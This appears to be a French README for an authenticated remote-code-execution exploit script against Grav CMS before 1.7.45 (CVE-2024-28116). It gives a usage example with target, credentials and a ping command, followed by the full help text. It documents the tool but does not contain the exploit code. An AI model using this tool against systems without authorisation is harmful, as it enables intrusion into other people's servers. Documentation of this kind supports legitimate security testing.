
Exploit contre Grav CMS (versions inférieures à 1.7.45) qui permet l'exécution de code à distance pour un utilisateur authentifié - CVE-2024-28116
Ce code est une adaptation du dépôt Github Graver avec quelques améliorations basées sur cette vidéo.
Exploit contre Grav CMS (pour les versions antérieures à 1.7.45) basé sur des vulnérabilités SSTI + RCE, identifiées sous le nom CVE-2024-28116. Ce script crée une page avec la vulnérabilité, l'exécute et, enfin, supprime la page après l'exécution.
python3 Grav_CMS_RCE.py -t http://10.10.10.10 -u 'admin' -p 'S3cureP4ssw0rd' -x 'ping -c 1 10.10.10.9'
Message d'aide :
$ python3 Grav_CMS_RCE.py -h
usage: Grav_CMS_RCE.py [-h] -t TARGET [-P PORT] -u USERNAME -p PASSWORD -x COMMAND [--no-delete-file] [--panel-route PANEL_ROUTE] [--no-banner] [--show-warnings]
Grav CMS RCE (Authenticated).
options:
-h, --help show this help message and exit
-t TARGET, --target TARGET
URL where Grav CMS is running. Example: http://10.10.10.10
-P PORT, --port PORT Port running Grav CMS. Default: 80
-u USERNAME, --username USERNAME
Username to authenticate in Grav CMS
-p PASSWORD, --password PASSWORD
Password for the user in Grav CMS.
-x COMMAND, --command COMMAND
Command to inject/run.
--no-delete-file Do NOT delete the generated files. Useful to check command execution output.
--panel-route PANEL_ROUTE
Admin Panel route in Grav CMS. Default: /admin
--show-warnings Show warnings (if there are).
Si pour une raison quelconque nous ne souhaitons pas supprimer les fichiers générés, nous pouvons utiliser l'option --no-delete-file, visiter la page indiquée par le script et lire la sortie de la commande.
Plus d'informations sur CVE-2024-28116 / cet exploit :
Le propriétaire de ce dépôt n'est pas responsable de l'utilisation de ce logiciel. Il a été créé à des fins éducatives uniquement.
MIT